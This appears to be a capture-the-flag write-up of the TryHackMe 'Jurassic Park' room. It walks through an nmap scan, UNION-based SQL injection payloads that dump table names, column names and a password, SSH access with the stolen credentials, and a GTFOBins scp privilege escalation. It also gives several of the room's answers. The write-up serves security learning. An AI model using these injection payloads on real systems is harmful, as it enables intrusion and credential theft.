Jurassic Park Tryhackme writeup
By Shamsher khan This is a Writeup of Tryhackme room “Jurassic Park”
Room link: https://tryhackme.com/room/jurassicpark
Note: This room is for Premium Members Only. who purchased THM premium membership.
Alright, enough of BS. Time to get our work done. Similar to Rick and Morty room, this Jurassic room does involve with SQL injection. I got a hard time solving this room but thanks to user Darkstar, I am able to complete this room. Let’s get started, shall we?
Task .1
nmap -sV 10.10.124.130
We found 2 open ports in the Nmap result which is Port 22 (SSH) and Port 80 (Http). Let’s check with port 80 first.
Let’s Visit Online shop
Look like we can do something on the URL field. How about the basic SQL injection?
I am going to change the parameter ?id= from 0 to 5 and see what other pages it brings up.
?id=0 — No results found
?id=1 — Gold package
?id=2 — Bronze package
?id=3 — Basic package
?id=4 — No results found
?id=5 — Development package (Interesting)
Look like we have user Dennis and we still have a chance on performing the SQLi but not with the filtered character and text. This time, we are going to use UNION. For your information, A UNION SQLi exploitation requires a small brute-force on the number of columns field. After a short investigation, we can perform the attack using five columns.
Now you can the vulnerable column is 2,4,5 so we can fetch the information using these three columns
Question 1. What is the SQL database called which is serving the shop information?
parkQuestion 2. How many columns does the table have?
5Question 3. Whats the system version?
ubuntu 16.04To fetch the tables from the database we can use query
?id=1 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema = database()
We can see that we have two tables items and users.
Now fetch users table information from database
?id=1 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = "users"
We know already username is dennis. So its time to fetch password
?id=5 union select 1,2,3,password,5 from users
So its Time to Get SSH on port 22
ssh dennis@10.10.124.130
Flag 1.
Locate and get the first flag contents.
Flag 2.
check the content of .viminfo file
cat /boot/grub/fonts/flagTwo.txtFlag 3.
Flag .4
There is no 4th flagFlag .5
Here we guess 5th flag can access only root user so its time to became root
An SCP huh. Let’s check the SCP variable in GTFObin.
Copy the line and escalate the privilege.
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
